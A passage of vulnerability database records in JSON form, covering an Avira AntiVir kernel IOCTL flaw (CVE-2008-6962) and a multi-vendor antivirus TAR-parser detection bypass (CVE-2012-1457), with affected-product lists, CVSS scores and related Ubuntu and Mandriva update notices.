      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/52612",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-264",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2009-08-13 16:30
Modified
2024-11-21 00:57
Severity ?
Summary
Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:-:-:premium:*:*:*:*:*",
                     matchCriteriaId: "60FC2C76-3B5F-418E-A2DD-9F5D2FBE4EF5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:6.35.00.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C23C179C-B50E-4F47-BFFA-85848131C99D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "B38A75AF-D8B4-4B54-87E9-6EED562CAAC1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:premium:*:*:*:*:*",
                     matchCriteriaId: "BECD1C6B-EC0F-4203-BA12-F8B02472FF4C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_professional:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E36F359D-D095-45BB-9154-707F3889B44F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_security_suite:-:-:premium:*:*:*:*:*",
                     matchCriteriaId: "F805305F-CFA4-4BC9-8C89-885D85B4B8E5",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.",
      },
      {
         lang: "es",
         value: "Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, y AntiVir Personal - FREE permite a los usuarios locales ejecutar arbitrariamente código a través de peticiones IOCTL manipuladas que sobreescriben un puntero al núcleo.",
      },
   ],
   id: "CVE-2008-6962",
   lastModified: "2024-11-21T00:57:55.190",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "LOCAL",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.2,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:L/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 10,
            obtainAllPrivilege: true,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2009-08-13T16:30:00.953",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/32269",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/advisories/2008/3130",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/32269",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/advisories/2008/3130",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-20",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

var-201203-0381
Vulnerability from variot

The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. The TAR file parsers in multiple products contain a vulnerability that can prevent malware detection. If it is announced that the problem also exists in different TAR parser implementations, this vulnerability may be split into multiple CVEs. A third party can bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Vulnerabilities exist in the TAR file parser in version 1004, Trend Micro HouseCall version 9.120.0.1004, VBA32 version 3.12.14.2, and VirusBuster version 13.6.151.0.
============================================================================ Ubuntu Security Notice USN-1482-1 June 19, 2012

clamav vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 LTS
  • Ubuntu 11.10
  • Ubuntu 11.04
  • Ubuntu 10.04 LTS

Summary:

ClamAV could improperly detect malware if it opened a specially crafted file.

Software Description: - clamav: Anti-virus utility for Unix

Details:

It was discovered that ClamAV incorrectly handled certain malformed TAR archives. (CVE-2012-1457, CVE-2012-1459)

It was discovered that ClamAV incorrectly handled certain malformed CHM files. (CVE-2012-1458)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 LTS: clamav 0.97.5+dfsg-1ubuntu0.12.04.1 clamav-daemon 0.97.5+dfsg-1ubuntu0.12.04.1 libclamav6 0.97.5+dfsg-1ubuntu0.12.04.1

Ubuntu 11.10: clamav 0.97.5+dfsg-1ubuntu0.11.10.1 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.10.1 libclamav6 0.97.5+dfsg-1ubuntu0.11.10.1

Ubuntu 11.04: clamav 0.97.5+dfsg-1ubuntu0.11.04.1 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.04.1 libclamav6 0.97.5+dfsg-1ubuntu0.11.04.1

Ubuntu 10.04 LTS: clamav 0.96.5+dfsg-1ubuntu1.10.04.4 clamav-daemon 0.96.5+dfsg-1ubuntu1.10.04.4 libclamav6 0.96.5+dfsg-1ubuntu1.10.04.4

In general, a standard system update will make all the necessary changes.

References: http://www.ubuntu.com/usn/usn-1482-1 CVE-2012-1457, CVE-2012-1458, CVE-2012-1459

Package Information: https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1 https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4 .

The Microsoft CHM file parser in ClamAV 0.96.4 allows remote attackers to bypass malware detection via a crafted reset interval in the LZXC header of a CHM file.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459 http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5

Updated Packages:

Mandriva Enterprise Server 5: d82d78601290e2f6073974170c81841a mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm 80f0475472c0217afd3727019bf27e53 mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm c13835eadea8d2af15b628fba3159e8b mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm d7c058fae32f1a081b1d4ca31157df0e mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm 5ad153709c7eb510c2be2e82bfa5ac52 mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm 96e3d3f3e9bea802c4109c155c9d1465 mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64: b30f5aafd9aaff0a7743fb62f33ccbea mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm 1508801239427c0ac72734f52cb4451c mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm 92b4c5ca6db656801b5b6ae217c6e171 mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm 94fad12df2cc900309087bbda13c826a mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm 8ec166a457d0512479adaaf5f80d487f mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm 19bc2758175bcde28ebf7783d68a9b98 mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf
OUr1QL5Wsvt3KboLKCdYUhE=
=1QL7
-----END PGP SIGNATURE-----



{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0381",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "virusbuster",
            scope: "eq",
            trust: 2.4,
            vendor: "virusbuster",
            version: "13.6.151.0",
         },
         {
            model: "avl sdk",
            scope: "eq",
            trust: 1.8,
            vendor: "antiy",
            version: "2.0.3.7",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "authentium",
            version: "5.2.11.5",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "avg",
            version: "10.0.0.1190",
         },
         {
            model: "bitdefender",
            scope: "eq",
            trust: 1.8,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "clamav",
            scope: "eq",
            trust: 1.8,
            vendor: "clamav",
            version: "0.96.4",
         },
         {
            model: "anti-malware",
            scope: "eq",
            trust: 1.8,
            vendor: "emsisoft",
            version: "5.1.0.1",
         },
         {
            model: "virus utilities t3 command line scanner",
            scope: "eq",
            trust: 1.8,
            vendor: "ikarus",
            version: "1.1.97.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "pc tools",
            version: "7.0.3.5",
         },
         {
            model: "esafe",
            scope: "eq",
            trust: 1.8,
            vendor: "aladdin",
            version: "7.0.17.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "kaspersky",
            version: "7.0.0.125",
         },
         {
            model: "security essentials",
            scope: "eq",
            trust: 1.8,
            vendor: "microsoft",
            version: "2.0",
         },
         {
            model: "scan engine",
            scope: "eq",
            trust: 1.8,
            vendor: "mcafee",
            version: "5.400.0.1158",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "rising global",
            version: "22.83.00.03",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "5.0.677.0",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "nod32 antivirus",
            scope: "eq",
            trust: 1,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "g data antivirus",
            scope: "eq",
            trust: 1,
            vendor: "gdata",
            version: "21",
         },
         {
            model: "trend micro antivirus",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 1,
            vendor: "f prot",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "k7computing",
            version: "9.77.3565",
         },
         {
            model: "quick heal",
            scope: "eq",
            trust: 1,
            vendor: "cat",
            version: "11.00",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 1,
            vendor: "anti virus",
            version: "3.12.14.2",
         },
         {
            model: "gateway",
            scope: "eq",
            trust: 1,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "4.8.1351.0",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 1,
            vendor: "symantec",
            version: "11.0",
         },
         {
            model: "antivirus \\& antispyware",
            scope: "eq",
            trust: 1,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "4.8.1351.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "5.0.677.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "rising",
            version: "22.83.00.03",
         },
         {
            model: "nod32 anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "frisk",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "g data",
            version: "21",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "k7 computing",
            version: "9.77.3565",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.8,
            vendor: "virusblokada",
            version: "3.12.14.2",
         },
         {
            model: "heal",
            scope: "eq",
            trust: 0.8,
            vendor: "quick heal k k",
            version: "11.00",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 0.8,
            vendor: "symantec",
            version: "11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "web gateway software",
            scope: "eq",
            trust: 0.8,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.3,
            vendor: "virusblokada",
            version: "3.12.142",
         },
         {
            model: "linux lts i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "12.04",
         },
         {
            model: "linux lts amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "12.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.10",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.10",
         },
         {
            model: "linux powerpc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux arm",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux sparc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux powerpc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux arm",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "virusbuster",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "13.6.1510",
         },
         {
            model: "trend micro",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "symantec",
            version: "20101.3103",
         },
         {
            model: "opensuse",
            scope: "eq",
            trust: 0.3,
            vendor: "suse",
            version: "12.1",
         },
         {
            model: "opensuse",
            scope: "eq",
            trust: 0.3,
            vendor: "suse",
            version: "11.4",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "rising",
            version: "22.8303",
         },
         {
            model: "cat-quickheal",
            scope: "eq",
            trust: 0.3,
            vendor: "quick heal",
            version: "11.00",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "pctools",
            version: "7.0.35",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "norman",
            version: "6.6.12",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "microsoft",
            version: "1.6402",
         },
         {
            model: "mcafee-gw-edition 2010.1c",
            scope: null,
            trust: 0.3,
            vendor: "mcafee",
            version: null,
         },
         {
            model: "enterprise server x86 64",
            scope: "eq",
            trust: 0.3,
            vendor: "mandrakesoft",
            version: "5",
         },
         {
            model: "enterprise server",
            scope: "eq",
            trust: 0.3,
            vendor: "mandrakesoft",
            version: "5",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "kaspersky",
            version: "7.0125",
         },
         {
            model: "computing pvt ltd k7antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "k7",
            version: "9.77.3565",
         },
         {
            model: "jiangmin",
            scope: "eq",
            trust: 0.3,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus t3.1.1.97.0",
            scope: null,
            trust: 0.3,
            vendor: "ikarus",
            version: null,
         },
         {
            model: "data software gdata",
            scope: "eq",
            trust: 0.3,
            vendor: "g",
            version: "21",
         },
         {
            model: "software f-prot antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "frisk",
            version: "4.6.2117",
         },
         {
            model: "nod32",
            scope: "eq",
            trust: 0.3,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "esafe",
            version: "7.0.170",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "emsisoft",
            version: "5.11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "antivir engine",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "7.11.1163",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.3,
            vendor: "avg",
            version: "10.01190",
         },
         {
            model: "avast5 antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "5.0.6770",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.8.1351.0",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "authentium",
            version: "5.2.115",
         },
         {
            model: "antiy-avl",
            scope: "eq",
            trust: 0.3,
            vendor: "antiy",
            version: "2.0.37",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Suman Jana and Vitaly Shmatikov",
      sources: [
         {
            db: "BID",
            id: "52610",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2012-1457",
   cvss: {
      "@context": {
         cvssV2: {
